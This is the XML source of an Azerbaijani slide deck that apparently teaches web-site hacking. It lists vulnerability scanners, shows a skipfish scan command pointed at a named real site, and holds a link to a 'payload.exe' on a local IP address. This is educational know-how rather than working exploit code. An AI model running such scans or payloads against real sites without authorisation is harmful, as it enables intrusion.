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Lst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="az-Lat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ad Qudayev" initials="FQ"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42D"/>
    <a:srgbClr val="112517"/>
    <a:srgbClr val="2F03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66" name="Yuxarı Sərlövhə Doldur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az-Latn-AZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048867" name="Vaxt Doldur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3CF7A-5E74-480A-ADC2-4413C53F6321}" type="datetimeFigureOut">
              <a:rPr lang="az-Latn-AZ" smtClean="0"/>
              <a:t>01.06.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="az-Latn-AZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048868" name="Slayd Görüntü Doldur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z-Latn-AZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048869" name="Qeydlər Doldur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az-Latn-AZ"/>
              <a:t>Əsas mətn üslubları redaktə etmək üçün klikləyin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="az-Latn-AZ"/>
              <a:t>İkinci səviyyə</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="az-Latn-AZ"/>
              <a:t>Üçüncü səviyyə</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="az-Latn-AZ"/>
              <a:t>Dördüncü səviyyə</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="az-Latn-AZ"/>
              <a:t>Beşinci səviyyə</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048870" name="Aşağı Sərlövhə Doldur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az-Latn-AZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048871" name="Slayd Nömrə Doldur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E75D3-7569-4437-8D85-7C8CA9716BC0}" type="slidenum">
              <a:rPr lang="az-Latn-AZ" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="az-Latn-A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Slayd Görüntü Doldurucusu 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048626" name="Qeydlər Doldurucusu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048627" name="Slayd Nömrə Doldurucusu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{755E75D3-7569-4437-8D85-7C8CA9716BC0}" type="slidenum">
              <a:rPr lang="az-Latn-AZ" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="az-Latn-AZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="dk1" tx1="dk1" bg2="dk1" tx2="dk1" accent1="dk1" accent2="dk1" accent3="dk1" accent4="dk1" accent5="dk1" accent6="dk1" hlink="dk1" folHlink="dk1"/>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Slayd Görüntü Doldurucusu 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048703" name="Qeydlər Doldurucusu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048704" name="Slayd Nömrə Doldurucusu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{755E75D3-7569-4437-8D85-7C8CA9716BC0}" type="slidenum">
              <a:rPr lang="az-Latn-AZ" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="az-Latn-A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48582" name="Freeform 6" title="Page Number Shape"/>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145728" name="Straight Connector 11" title="Verticle Rule Line"/>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583" name="Title 1"/>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1048584" name="Subtitle 2"/>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48585" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8286356" y="6007608"/>
            <a:ext cx="3143643" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/1/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048586" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078991" y="6007608"/>
            <a:ext cx="6720837" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048587" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"/>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{D79E6812-DF0E-4B88-AFAA-EAC7168F54C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr algn="ct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33" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048834"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35" name="Date Placeholder 6"/>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836" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048837"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22" name="Vertical Title 1"/>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1048823" name="Vertical Text Placeholder 2"/>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24" name="Date Placeholder 6"/>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825" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048826"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1" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104859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3" name="Date Placeholder 6"/>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594" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048595"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38" name="Title 1"/>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1048839" name="Text Placeholder 2"/>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840" name="Date Placeholder 6"/>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841" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048842"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048843" name="Content Placeholder 2"/>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44" name="Content Placeholder 3"/>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45" name="Date Placeholder 8"/>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846" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048847" name="Slide Number Placeholder 10"/>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1048848" name="Title 4"/>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48849" name="Text Placeholder 2"/>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50" name="Content Placeholder 3"/>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51" name="Text Placeholder 4"/>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52" name="Content Placeholder 5"/>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53" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048854" name="Date Placeholder 11"/>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855" name="Footer Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048856" name="Slide Number Placeholder 13"/>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18" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048819" name="Date Placeholder 5"/>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820" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048821" name="Slide Number Placeholder 7"/>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57" name="Date Placeholder 4"/>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858" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048859"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048860" name="Content Placeholder 2"/>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61" name="Text Placeholder 3"/>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62" name="Date Placeholder 8"/>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863" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048864" name="Slide Number Placeholder 10"/>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1048865" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758952" y="758952"/>
            <a:ext cx="3831336" cy="2930179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:body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048827" name="Picture Placeholder 2"/>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48828" name="Text Placeholder 3"/>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29" name="Date Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{53BEF823-48A5-43FC-BE03-E79964288B41}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>6/1/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048830" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048831" name="Slide Number Placeholder 10"/>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1048832" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758952" y="758952"/>
            <a:ext cx="3831336" cy="2926080"/>
          </a:xfrm>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48576" name="Freeform 6" title="Page Number Shape"/>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048577" name="Title Placeholder 1"/>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578" name="Text Placeholder 2"/>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48579" name="Date Placeholder 3"/>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6/1/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048580" name="Footer Placeholder 4"/>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1048581" name="Slide Number Placeholder 5"/>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fuadnihal.az/"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192.168.1.102/payload.exe"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48596" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="89649"/>
            <a:ext cx="12020550" cy="6625476"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR"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Veb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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az-Latn-AZ"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Səhifələrində hakinq etmək üçün hər hakinq də olduğu kimi öncədən bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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veb s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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əhifə haqqında məlumat toplamaq lazımdırki, həmin səhifədə hər hansı bir təhlükəsizlik boşluğunun mövcudluğunu aşkar olunsun.</a:t>
            </a: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az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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unun üçündə bəzi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="18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programlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="18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mövzuddur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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br>
              <a:rPr lang="az-Latn-AZ"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b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tr-TR"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WAES</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Linux </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Əməliyyat sistemləri üçün inkişaf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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ettirilmiş</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bir və içərisində 10-a yaxın </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ"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programı</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birləşdirərək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veb</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sə</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fəsi</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haqqında məlumat toplayan programdır. Github vəsitəsiylə yükləyə bilərik.</a:t>
            </a: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tr-TR"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RAPİDSCAN</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Linux Əməliyyat sistemləro üçün inkiş</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 etdirilmiş və İçərisindəki 10 a yaxın program vasitəsiylə 80 fərqli axtarma üsulu ilə bizə hədəf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veb</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sə</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fəsi</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haqqında ətraflı məlumat verir.Github vasitəsiylə yükləyə bilərik.</a:t>
            </a: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tr-TR"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WAPITI</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H</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ədəf veb səhifəsində </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ara Qutu</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üsulu ilə təhlükəsizlik açığı axtaran programdır yəni hədəf səhifənin linkində fərqli parametrləri yoxlayır və bunların verdi reaksıyalara uyğun nəticə çıxarır.Github vasiyəsiylə yükləyə bilərik.</a:t>
            </a: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az-Latn-AZ"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XSSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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WN </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Veb</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sə</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fələrdə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XSS açığının aşkarlanması üçün fərqli payload kodları istifadə edərək bu açığn olub olmadığını tapır.</a:t>
            </a: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tr-TR"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VOOKİ</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Həm windows </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həmdə linux əməliyyat sistemlərində istifadə edilə bilən və pulsuz olan bir programdır.Məlumat toplamaq , təhlükəsislik açıqlarını tapmaq və.s üçündür və Proxy funksiyası ilə fərqli İP lər işlədərək Veb səhifəsində təhlükəsizlik açığı aşkarlanması üçün axtarışlar verə bilir.</a:t>
            </a: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az-Latn-AZ"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ZAPROXY</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Dünyada Ən Məşhur Veb Səhifələr üçün təhlükəsizlik açığı axtaran programdır 2 növ axtarış növü var </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“Automatic” v</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ə </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”Manuel”  Automatic bölməsi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veb</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sə</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fədə</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giriş olmadan </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icazə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verilən</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sə</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fələrdə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axtarış edir </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Manuel bölməsi ilə istifadəçi girişi olunan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sə</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fələrdə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əl ilə giriş etdikdən sonra axtarış edir.</a:t>
            </a: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tr-TR"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SKİPFİSH</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Google tərəfindən inkişaf etdirilən bir programdır.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Hədəf</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sə</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fəni</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axtarış verdikdə tapılan məlumatları sistemdə qovluğa yazır və bittikdən sonra görmək üçün .html uzantılı fayla giriş edirik.</a:t>
            </a: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Bu programlardan əlavə : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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UNISCAN-GUI</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az-Latn-AZ"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SQLMAP</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az-Latn-AZ"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NESSUS</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az-Latn-AZ"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OPENVAS</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az-Latn-AZ"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LFİSUİTE</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az-Latn-AZ"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və.s</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nümunə vermək olar.</a:t>
            </a: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az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048872" name="Metin kutusu 1048871"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9373026" y="324819"/>
            <a:ext cx="1588066" cy="993140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="6000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="60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97163" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126515" y="303852"/>
            <a:ext cx="5969485" cy="3125148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097164" name="Şəkil 8" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6254148" y="221167"/>
            <a:ext cx="5563082" cy="4915326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048643" name="Mətn Qutusu 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3581184"/>
            <a:ext cx="6498021" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İlk olaraq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Skipfish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> toolu ilə hədəf shifəni scan edirik</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>skipfish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://fuadnihal.az</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
